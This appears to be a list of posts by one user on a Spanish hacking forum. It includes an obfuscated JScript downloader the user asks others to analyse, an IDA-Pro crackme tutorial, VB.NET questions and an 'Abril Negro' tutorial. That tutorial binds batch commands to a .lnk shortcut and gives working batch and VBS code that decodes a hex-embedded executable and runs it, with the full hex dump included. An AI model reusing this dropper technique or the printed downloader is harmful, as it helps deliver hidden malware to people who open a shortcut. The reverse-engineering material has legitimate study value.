  293.        ariae: "Nnk",
  294.        qwxv: "2",
  295.        mzd: 347,
  296.        lrj: "D",
  297.        xba: 817,
  298.        njrs: "Gwjcf",
  299.        cvu: "1200000",
  300.        izgfd: "S",
  301.        zrjc: "Gdqid",
  302.        iatqy: "g",
  303.        yrxhc: "May",
  304.        mgjj: "O",
  305.        tlvvq: "E"
  306.    },
  307.    bcx = ["O", "Ctqo", "Mnj", 998, "289", "h", 883, "Taqis", "Fysx", "Eclw", "w", 844, "Litn", 559],
  308.    divuu = {
  309.        mse: "N",
  310.        mwdpo: 718,
  311.        eso: "F",
  312.        eplv: "v",
  313.        ftcn: "Ont",
  314.        iftxt: "b",
  315.        mgwqa: 491,
  316.        fnhs: 928,
  317.        oob: "Y",
  318.        fdjm: 225,
  319.        rdpeg: "Wlbe",
  320.        qhmy: 945,
  321.        pnv: "30000",
  322.        mxnu: "Bhnem",
  323.        qct: "M",
  324.        puokp: "283"
  325.    },
  326.    zhi = ["i", "n", "Jkh", 993, 415, "597"],
  327.    niu = {
  328.        sjmkx: "%",
  329.        fsvd: "r",
  330.        mxq: "f",
  331.        suy: "F",
  332.        wxjh: "l",
  333.        lvg: "j",
  334.        tgy: "Jxqf",
  335.        fih: "S",
  336.        mywhk: "c",
  337.        uneo: "A",
  338.        tyscc: 331,
  339.        chz: 885,
  340.        cviwo: "Bavuc",
  341.        grk: "!",
  342.        otvcq: "Sdyw",
  343.        bkypx: "Jmn",
  344.        rap: 558,
  345.        kpfgu: 965
  346.    },
  347.    rwnw = {
  348.        soqvz: 690,
  349.        jpjv: "Ipgkx",
  350.        nqnk: "Xguxt",
  351.        jurt: 966,
  352.        tzdmn: 187,
  353.        wozz: "Jxmg",
  354.        qxlpk: "Twrj",
  355.        kfc: "J",
  356.        slevm: "C",
  357.        nfgwb: 918,
  358.        ohz: "Hwqrt",
  359.        xnrh: "Ajx",
  360.        mgi: "J",
  361.        punj: 364,
  362.        uey: "2",
  363.        jrkzz: 664
  364.    },
  365.    put = {
  366.        ibb: 68,
  367.        poihe: "t",
  368.        tsf: "\\",
  369.        begwe: "H",
  370.        sxwc: 115,
  371.        tzxjt: "s",
  372.        xqor: "*",
  373.        bbf: "ActiveXObject",
  374.        qcx: "F",
  375.        dzy: "V",
  376.        pjb: "7619",
  377.        pmged: "*",
  378.        wvduv: "K",
  379.        ifbd: "Iqxpc",
  380.        hykw: "d",
  381.        pgt: "F",
  382.        cvi: 848
  383.    },
  384.    kfo = {
  385.        krrxd: "(",
  386.        tbcl: 507,
  387.        tlxoz: "X",
  388.        amo: "Tos",
  389.        amuzg: " ",
  390.        zns: "A",
  391.        zvqln: 14,
  392.        cocmt: "Yrcje",
  393.        kstve: 278
  394.    },
  395.    lcza = [-597],
  396.    ymdeu = [289],
  397.    hkjyt = [],
  398.    bigjj = [7],
  399.    ahunl = [];
  400. ahunl[0] = wmnhg("deoLbw$Aca_");
  401. for (var nngl = [0], ael = [mizvs("ZbvNEXgH))f")], hdqk = !1, ephrk = bsqoi(pgig(")g.6j1Xt^rKI5")), xeu = eval(sekmh("2oO25X_m7:+z") + ephrk + vme("n*&xINca.4m,0")), faefr = ActiveXObject, dykkd = bsqoi(aic("&96t3k-uvdL.DE")), lye = 0; lye < ahunl[thk("W%JCQ3myM01ki4Z")]; lye++) {
  402.    var gzsn = bsqoi(padva("uHY$X1ghzz^gIp*")),
  403.        hre = new faefr(dykkd + fqlvs("R2GC6!mM(:,^7") + gzsn + thpfk("cc5cN6kL%n%Af"));
  404.    try {
  405.        var xvxb = hre[eda("+L01EvS-k2gNj")](2),
  406.            nco = new faefr(vupzg("Gb&;CYxSb-")),
  407.            cbic = 3e4,
  408.            dslh = 6e4,
  409.            phyg = 3e4,
  410.            ncz = 12e5;
  411.        nco[ilgq("2.ddPpkd%%")](cbic, dslh, phyg, ncz);
  412.        try {
  413.            for (; fpu("Pv^D4gcfmo8");) {
  414.                var voyg = azqp();
  415.                if (voyg[lqlrb("0,IH_$wKM51b)E")](cwk(".-Q(jqSKfQ$)Z"), plh("8D2w0E*D*bG"), !1), voyg[yorid("9^($osbnH1f*aLL")](), 200 != voyg[yhinm("QS9EhlGR2:u4e")]) break
  416.            }
  417.        } catch (n) {}
  418.        if (5 == nngl[lye]) {
  419.            var umjf = xeu[nla("ZbsKQkX582TO")],
  420.                row = umjf[nof("VHNyeMELz%Sm^Nn")](0, umjf[mrfu("sz+7M6Su,!@QH.l")] - 3);
  421.            ahunl[lye] += row
  422.        }
  423.        xvxb += frt("9@O_6.t^e_Ux80"), xvxb += ael[lye];
  424.        var mlh = 5;
  425.        do {
  426.            nco[ksp("U6uOcmHDTV")](vgjl("v2iV$^O:geUD@"), ahunl[lye], 0), nco[twy("ME(bHjfii,C!yv")](), mlh--
  427.        } while (200 != nco[ujgwe("S1E7.*Hnj8TZ")] && mlh);
  428.        if (200 == nco[yzzhd("P(SlasP2Ik7")]) {
  429.            var ozefl = new faefr(yhiwo("Uo$Mu;z!!:2D") + ephrk + yjf("xe5LT.($QI"));
  430.            if (8 == nngl[lye] && (nngl[lye] = 0), nngl[lye] <= 3) {
  431.                var dzpj = new faefr(zxoum("a6XKUWTxbiy3AZ("));
  432.                dzpj[pcf("!9w9oSyDg)(e0")](), dzpj[mipjn("zKCmP;87XLBfq:S")] = 1, dzpj[sehl("C8DnpB4%x@-8j*R")] = 0, dzpj[ssdie("W1IZ@l%z-P")](nco[nlc("PchLD7hONF53")]), dzpj[mkwm("nl4zGi!QzjC;V")](xvxb), dzpj[rvl("6-OC&xsf60(t7")](), nngl[lye] || ozefl[axvhz("n(LZAZLoC)r")](bsqoi(wzuge("1vqBn*0MR)z")) + qyno("@L&E^tromug") + bsqoi(wnpk("k(@h%.q!aTO84X")) + zgmt(":dIflb($+-Z7!!!") + xvxb, 0, 0)
  433.            }
  434.        }
  435.    } catch (n) {}
  436. }
  437.  
  438.  


saludos Flamer y a ver quien me ayuda o le na se la carcomita de que hace este codigo

MOD: URL modificada para evitar clicks indeseados.
35  Programación / Ingeniería Inversa / Busco El Crackme 2 De Devastador en: 30 Junio 2018, 19:51 pm
Hola amigos ando buscando el crackme 2 de devastador por si alguien lo tiene que me lo pase ya que se callo el link donde tenia la solucion y quiero hacerle video

36  Programación / Ingeniería Inversa / vuelbe crackmes.de solo es un espejo de la pagina en: 12 Octubre 2017, 02:21 am
hola amigos como la pagina http://www.crackmes.de/ esta fuera de servicio hace ya algún tiempo, aquí les traigo un espejo de ella y es esta pagina, es una copia de la original

http://crackmes.cf/

http://crackmes.cf/archive/

http://crackmes.cf/users/

bueno saludos y espero le sirva a alguien
37  Programación / .NET (C#, VB.NET, ASP) / hacer split y almacenarlo en una matriz en vb.net en: 15 Julio 2017, 21:19 pm
hola quiero hacer una operacion con el comando split pero quiero que el resultado sea almacenado en una matriz ejemplo

tengo esta variable llamada cadena que es igual a

Código
  1. dim cadena as string = "0-1-2-3-4-5-6-7-8-9"
  2.  

y declaro una matriz de 1x10 así

Código
  1. dim matriz(1,9) as string
  2.  

quiero hacer split y que el resultado sea almacenado en la posicion 0 hasta 10 de la matriz sin hacer esto

Código
  1. dim vector() as string
  2.  
  3. vector=split(cadena,"-")
  4. for x=0 to 9
  5.   matriz(0,x)=vector(x)
  6. next
  7.  

para que me entiendan quiero aguardar el vector en una fila de la matriz

Saludos Flamer y quiero ahorrarme el ciclo
38  Programación / Programación General / Concatenar cadenas o string verticalmente en: 10 Julio 2017, 22:32 pm
hola amigos hoy se me ocurrió una idea y es que común mente en cualquier lenguaje de programación si queremos concatenar 2 cadenas se ase lo siguiente

Nota: puse el signo mas para que se entendiera, no me estoy refiriendo a ningún lenguaje en particular

Código
  1. cadena3=cadena1 + cadena2
  2.  

si cadena1 vale "01234" y cadena2 vale "56789" entonces el resultado de cadena3 seria "0123456789" eso es para todos los lenguaje


ahora volbiendo al tema, si tenemos que cadena1 es igual a
"
0
1
2
3
4
"

y cadena2 es igual a

"
5
6
7
8
9
"
ahora hacemos la concatenación que no se como es y es lo que quiero que me digan si se puede, quiero que el resultado sea este
"
05
16
27
38
49
"

a eso me refiero si se puede hacer

saludos Flamer

39  Programación / Ingeniería Inversa / Resolviendo El Crackme 3 De EnigmaGroup Con IDA-Pro en: 6 Mayo 2017, 05:10 am
Anteriormente había dicho que no haría tutorial de el crackme 3 de EnigmaGroup pero como trato de aprender IDA are una excepción y resolveré el crackme con IDA-Pro.

bueno si no tienen el crackme lo pueden descargar desde su pagina oficial esta:

https://www.enigmagroup.org/pages/cracking

ahora ya que descargaron el crackme pasaremos abrirlo con IDA, pero una cosa muy importante antes de intentar crackear un programa con IDA deben de saber si el programa o crackme es de 32 o 64 bits.

una solución para saber si el crackme es de 32 o 64 bit es abrirlo con el RDG Detector, así que ami al abrirlo con el me sale la siguiente imagen



y como ven donde esta marcado de rojo dice que es de 32 bits, asi que al abrirlo con IDA lo abriremos con IDA 32 bits que es esta.



para los que no saben IDA te instala 2 versiones por eso es muy importante saber que versión es el programa que queremos reversear.

A continuación nos aparecerá una pantalla la cual daremos clic en New



acto seguido ubicaremos el crackme 3 de enigma group, el cual yo lo tengo en la carpeta descargas



después damos clic en abrir y se abrirá la siguiente ventana donde seleccionamos la primera opción y damos clic en OK



bueno ya con esto tendremos el crackme abierto y listo para crackear así que primero buscaremos en las apis que utiliza el crackme para comparar los seriales y para eso nos iremos ala pestaña Imports y nos muestra lo siguiente



Como ven utiliza la misma api que en los crackmes anteriores.

bueno una cosa muy importante no se asusten ya que IDA es mas extenso y laborioso que ollydbg, ya que tiene mas instrucciones pero poco a poco iremos aprendiendo ya que yo todavía no lo domino y una de las cosas que extraño de el ollydbg que no distingo las instrucciones de otras ya que en el desensamblado que mas adelante les presentare, todas las instrucciones tienen el mismo color y no se distinguen a simple vista tengo que seleccionarlas y para eso ando fijando mucho la vista en fin ojala en versiones futuras mejoren eso.

ahora para no andar buscando en el desensamblado la api  __vbaVarTstEq haremos lo siguiente, nos iremos a la pestaña IDA View-A  que es la que nos muestra el desensamblado del programa



y como verán es muy distinto a el ollydbg pero como dije no se asusten que todo tiene remedio, bueno ya que estamos aqui nos iremos al icono siguiente



también pueden dar clic en la pestaña Search y buscar la opción Text la cual tiene el mismo icono que seleccionamos.

a continuación muestra la siguiente ventana



y escribimos el nombre de la api que deseamos encontrar y marcamos las mismas instrucciones y al ultimo presionamos OK

después de esto se abrirá una nueva pestaña donde nos muestra las direcciones donde se utiliza dicha api, así que yo ubique el call donde se hacen las comparaciones de las cadenas el cual para eso fui analizando cada resultado que me dio la búsqueda y es este



para irnos a esa dirección solo damos clic sobre el y nos redirige hasta esta ubicación



Asi que ya tenemos ubicado donde compara las string, asi que para eso pondremos un break-point y tracearemos con F7 igual que ollydbg y para eso solo damos clic al circulo azul de esa linea hasta que se haga rojo y nos marque la linea asi



y ahora pasaremos a ejecutar la aplicación con F9 y si les aparece la siguiente ventana seleccionamos la siguiente opción



Damos OK y por ultimo volvemos a presionar F9

Ahora si nos aparece la ventana del crackme y así que ingresaremos la contraseña que sea, yo ingresare "123456" y presionamos el botón submit



al presionar el botón el programa se detiene justo en el break-point que pusimos este



ahora presionaremos F7 para ingresar en el CALL e ir revisando la pila o stack

Nota: para ir revisando que es lo que se encuentra en el stack iremos dando clic sobre las instrucciones que digan Debug como estas



y el contenido es mostrado en la sección del DUMP

Bueno asi que al tracear con F7 e llegado a la siguiente sección



y al pararme en esta linea reviso el stack o pila y veo que me muestra lo siguiente



y presiono sobre la primera y me muestra lo siguiente en el Dump



ahora presiono la segunda



y guala la clave es "Debug54321" y al ingresar esa clave en el crackme me muestra lo siguiente



Bueno eso es todo amigos espero les haya gustado

Saludos Flamer
40  Programación / Scripting / [Abril Negro] Unir Archivos Exe,Vbs y Bat a Un Acceso Directo lnk en: 6 Abril 2017, 02:11 am
Este tema lo publique en mi blog y ahora se los traigo aqui para el abril negro

Ase mucho en mis principios uní un archivo lnk con un exe este era ejecutable desde el lnk, asiendo doble clic sobre el y ahorita que me acuerdo yo en ese entonces usaba el comando debug del antiguo símbolo del sistema para recrear el ejecutable.

trate este tema en el siguiente hilo

https://foro.elhacker.net/analisis_y_diseno_de_malware/unir_autorun_y_exe-t271077.10.html

en el un usuario me tomo a locura lo que estaba diciendo eso fue 2009 pero yo cuando había hecho esos experimentos por llamarlos así hacia mas años, aun no recuerdo si seria en el 2007 o 2006 y como dije usaba el comando debug, yo nunca dije en el foro como lo hice hasta ahora lo explico.

primeramente crearemos un acceso directo al símbolo del sistema en el escritorio, no explicare como crearlo creo que ya tienen las bases suficientes para saber.

 ya que lo tengan creado daremos clic derecho sobre el y daremos clic en propiedades y en el cuadro de texto de destino que es este:



pondremos lo siguiente

C:\Windows\System32\cmd.exe /c type w.lnk> worm.bat&worm.bat

y ahora abriremos el bloc de notas y dentro de el pondremos los comandos de nuestro bat, yo pondré estos



OJO= fíjense que deje un espacio de 3 lineas y después puse los comandos pueden ser 2 o una, esto es para que no se mezcle con los bites del lnk.

ahora pasaremos a aguardarlo, yo le pondré 96.txt, ya que no es necesario que lleve la extensión bat

ya que tenemos el archivo lnk y los comandos que irán debajo del lnk pasaremos a juntar los, para eso abriremos el símbolo del sistema y nos fijamos en la carpeta del escritorio y teclamos lo siguiente

Nota: mi archivo lnk tiene por nombre "6.lnk" y el archivo que lleva los comandos se llama "96.txt"

copy /b 6.lnk+96.txt w.lnk

nos que daría un archivo llamado "w.lnk", que al ejecutarlo ejecuta los comandos que tenia el archivo 96.txt.

creo que ya tienen una idea de como seguir, así que crearemos un bat que genere un archivo vbs, el cual generara un exe así que el código del bat seria este

Código
  1.  
  2. @echo off
  3. echo option explicit                                           >worm.vbs
  4. echo Dim x,objsystem,file,i,f,largo,bit,bytes,shell            >>worm.vbs  
  5. echo Set objsystem = CreateObject("Scripting.FileSystemObject")>>worm.vbs
  6. echo set shell = createobject("wscript.shell")                 >>worm.vbs
  7. echo Set file = objsystem.getFile("w.lnk")                     >>worm.vbs  
  8. echo largo=file.size                                           >>worm.vbs
  9. echo Set f = file.OpenAsTextStream()                           >>worm.vbs  
  10. echo for i=1 to largo                                          >>worm.vbs
  11. echo     bytes = bytes + f.read(1)                             >>worm.vbs  
  12. echo next                                                      >>worm.vbs
  13. echo f.close                                                   >>worm.vbs
  14. echo bit=split(bytes,"==codingvbs==")                          >>worm.vbs  
  15. echo set file = objsystem.createtextfile("Crackme1.exe")       >>worm.vbs
  16. echo for x=1 to len(bit(2)) step 2                             >>worm.vbs
  17. echo    bytes = mid(bit(2),x,2)                                >>worm.vbs
  18. echo    file.write(chr("&H" + bytes))                          >>worm.vbs
  19. echo next                                                      >>worm.vbs
  20. echo file.close                                                >>worm.vbs
  21. echo wscript.sleep 2000                                        >>worm.vbs
  22. echo shell.run "Crackme1.exe",1                                >>worm.vbs
  23. wscript.exe worm.vbs
  24.  

al bat lo llamaremos "comandos.bat", ahora crearemos un archivo que contendra los bites del exe en valores hexa decimales, al cual llamaremos "code.txt" y contendrá lo siguiente

Código
  1. ==codingvbs==4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000B80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000008F8AF9DBCBEB9788CBEB9788CBEB978848F79988CAEB9788A2F49E88CAEB978822F49A88CAEB978852696368CBEB97880000000000000000504500004C0103007180B7430000000000000000E0000F010B01060000200000002000000000000008120000001000000030000000004000001000000010000004000000010000000400000000000000005000000010000044DF00000200000000001000001000000000100000100000000000001000000000000000000000004426000028000000004000001406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000280200002000000000100000A80000000000000000000000000000000000000000000000000000002E746578740000008C190000001000000020000000100000000000000000000000000000200000602E64617461000000040A0000003000000010000000300000000000000000000000000000400000C02E727372630000001406000000400000001000000040000000000000000000000000000040000040C52C25411000000000000000000000004D535642564D36302E444C4C000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FCB149738D69497373104A734E624973D568497324734773E14B3C7302624973A7663C732C453C73E3423C73292F48739A6249739A63497364B34973AF443C736FD83B7378B73B738A69497385E33C7309B449737C6747735B4E3C731D6649734E6349737F9D4A73A1B24973CE624973CE63497309644873026349733D5D49733EDE3A73CA164A73DC9D4A7336B14973EA204973BAB44973350F4973FE473C73D7503C73000000001500100002234000000000000A234000C0104000000000000100000001000000DA224000000000007DC39425AD49B25405000800E423400000000000EB23400005000800E324400000000000EA24400005000800F425400000000000FB2540000000000000000000FF253C104000FF2558104000FF2564104000FF2530104000FF251C104000FF256C104000FF250C104000FF257C104000FF2534104000FF2578104000FF2570104000FF2560104000FF2548104000FF255C104000FF2510104000FF2504104000FF258C104000FF2500104000FF2598104000FF2568104000FF2538104000FF2550104000FF2594104000FF2590104000FF2544104000FF2508104000FF2584104000FF252C104000FF2514104000FF2520104000FF25A0104000FF259C104000FF2518104000FF2528104000FF2574104000FF2524104000FF2588104000FF2554104000FF2540104000FF254C104000FF2580104000000068F4164000E8EEFFFFFF000000000000300000004000000000000000A1B68322BCF5C74EA7E4A3927EB7E3510000000000000100000000000000000050726F796563746F310000000000000000000000FFCC310003FE22228A455D81448B4E885B15F0513142E3E915F7541E4B93B8F05E7BD708073A4FAD339966CF11B70C00AA0060D393000000000000000000000000000000000000000000000000000000000000000000000000E803000062030000000500466F726D31000D011D002020202020437261636B6D65202337202020506F722020466C616D6572001901004200220123060300006C740000FE0200000000010001002040000001000400E8020000160000002800000020000000400000000100040000000000800200000000000000000000000000000000000000000000000080000080000000808000800000008000800080800000C0C0C000808080000000FF0000FF000000FFFF00FF000000FF00FF00FFFF0000FFFFFF00FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FF9FFF999FF99FF9FF9F9F9FF9FF9FFF9F9FF9FF9F9FF9F9FF9F9F9FF9F9FFFF9F9FF9FF9F9FFFF9F9FF9F9FF9F9FFFFFF9FFF999F9FFFF99FFF9F9FF9F9FFFFFF99FFFF9F9FF9F9F9FF9F99F9F9FFFF9F9F9999FFF99FF9FF9F9F9F9FFF9FFF9FFFFFFFFFFFFFF9FFFFFFFFFFFFF999FFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFF999FFFFFFFFFFFFFFFFFFFFF9FFF9FF9FFFFFFFFFFFFFFFFFFFFFFFF9FFFF9F9999FFFFFFFFFFFFFFFFFFFFF9FFFF9F9FF9FFFFFFFFFFFFFFFFFFFFF9FFFF9FF99FFFFFFFFFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFF999F999F9999FF999FF999F999F9999FF9FFF9FF9FFFF9FFFF9FFFFF9F9FF9FFF99999FFF99FF9999F9FFFFF9FF999FFFF9F9FFF9FF9F9FF9F9FF9FF9FFFF9FFFF9F9FFFF9999F99FFF999F99FF99FFFFF9F9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFF9FFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000240500466F726D310026002700352D000000B3010000880E0000710700004603FF011C0000000106004672616D653100030578007800A70D9F06120000FF0135000000020A007478745F53657269616C000204F0006801C70B77010B0F00496E677265736120456C20436F6465001202002402FF032B000000030800436F6D6D616E6431000401090056657269666963617200044803380417077701110100FF02020400000007000000DC1E400050000000FE22228A455D81448B4E885B15F0513100000000000000000000000000000000000000009001000000000000000000000000000000000000000000004104000000000000581240004C00000056423521F01F56423645532E444C4C00000000002A000000000000000000000000000A000A0C000009040000000000008C1740001CF0300000FFFFFF080000000100000001000000E9000000A41640009C1640001412400078000000810000008B0000008C000000000000000000000000000000000000004B657947656E6D650050726F796563746F31000050726F796563746F31000000F4010000E41C400000000000E021400040264000FC0900000830400016114000003040002A005C00410043003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C0046006C0061006D00650072005C004D0069007300200064006F00630075006D0065006E0074006F0073005C004800610063006B0069006E0067005C0043007200610063006B0069006E0067005C004D0069007300200043007200610063006B006D00650073005C0043007200610063006B006D006500200037005C00500072006F0079006500630074006F0031002E0076006200700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009C1640000100000001000000E41C4000000000003C214000FFFFFFFF00000000381D40000830400001000000401A4000000000000000000000000000401A400001000000A01D400000000000441A4000010000004C1A400000000000481A4000040000004C1A40000400B70168006C00EC1A4000F032400000000000A0DA200000000000B01D4000C01D4000400018003C000000D01D4000020003000000000000000000FC1A400050CF2000E01D4000020003004000110040000000681E4000030003000000000000000000741B400060CF2000781E40000300030040000D0044000000841E4000010003000000000000000000D01B400070CF2000941E40000100030040001F00480000009C1E4000FFFFFFFF00000000000000001C1C400080CF2000AC1E4000FFFFFFFFD21C4000DF1C4000B81C4000C51C4000000000004C1A4000C8194000EE114000F4114000FA11400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000741A4000C8194000EE114000F4114000FA114000B01C400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009C1A4000C8194000EE114000F4114000FA1140000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000C41A4000C8194000EE114000F4114000FA114000000000000000000000000000000000000000000000000000BD1C4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000816C24043F000000E933050000816C240447000000E976060000816C2404FFFF0000E949070000816C2404FFFF0000E94C080000000000002C3040007C214000FFFFFFFF000000001C304000988DAE1D6306F14EABE1CAAE39F6073E0A00010001000100381D4000000000000000000000000000841D4000090400000A0C00000000000002000000C8194000FFFFFFFF201F40000000000000000000000000007C1D400005000000681D4000FFFF0000838001000000000073007400650069006E002900101F40001C1F4000466F726D3100000050726F796563746F3100000042E3E915F7541E4B93B8F05E7BD7080757CC2B8E8DA552469C17B77ECC47F6FCFE22228A455D81448B4E885B15F0513144E923EC7903FB479066AA7CD42C4AF7E24EAD339966CF11B70C00AA0060D3937478745F53657269616C00002E3DFBFCFAA06810A73808002B3371B5433A5C4172636869766F732064652070726F6772616D615C4D6963726F736F66742056697375616C2053747564696F5C564239385C5642362E4F4C420000000056420000EC1D4000000000000600000009000000FC1D40003C1E4000D03240000000000000000000A8161C00F24EAD339966CF11B70C00AA0060D393436F6D6D616E643100000000EA4EAD339966CF11B70C00AA0060D3934672616D653100003A4FAD339966CF11B70C00AA0060D393466F726D00000000090000006B65726E656C333200000000120000004973446562756767657250726573656E74000000B81E4000C81E400000000400D43240000000000000000000A1DC3240000BC07402FFE068DC1E4000B8A0114000FFD0FFE0000000436F72726563746F000000004D616C000C0054000000000000000000E14EAD339966CF11B70C00AA0060D393F14EAD339966CF11B70C00AA0060D3937200000043006F00720072006500630074006F002E002E002E002E00460065006C0069007300690064006100640065007300200041006D00690067006F002000410068006F00720061002000500072006F006700720061006D006100200045006C0020004B0065007900670065006E002E002E002E0000001000000043006F00720072006500630074006F000000000022000000530065007200690061006C00200049006E0063006F00720072006500630074006F0000000A0000004500720072006F0072000000564241362E444C4C000000005F5F766261467265655661724C697374000000005F5F766261566172447570005F5F7662614F626A53657400000000005F5F76626153657453797374656D4572726F72005F5F7662614578697450726F630000005F5F766261467265654F626A000000005F5F76626146726565537472000000005F5F76626148726573756C74436865636B4F626A000000005F5F766261493453747200005F5F7662614F6E4572726F72000000005F5F766261467049340000003C2140000000000000000000000000000000000000000000F4204000182140000000F906FFFF00000000000002000360D42040000000000000000000000000001E0000000000FD06FFFF00000000000003000360D42040000000000000000000000000001E00000000000000C8194000FFFFFFFF000000000200000000000000E020400000000000D8204000D4204000D4204000000000000000000000000000540000000400000000000000E41C4000FFFFFFFF00000000D4204000000000000000000000000000FFFFFFFF00000000401E4000D01D4000E0324000401E4000681E4000E4324000401E4000841E4000E8324000401E40009C1E4000EC324000CCCCCCCCCCCCCCCCCCCCCCCCE9E9E9E9CCCCCCCCCCCCCCCCCCCCCCCC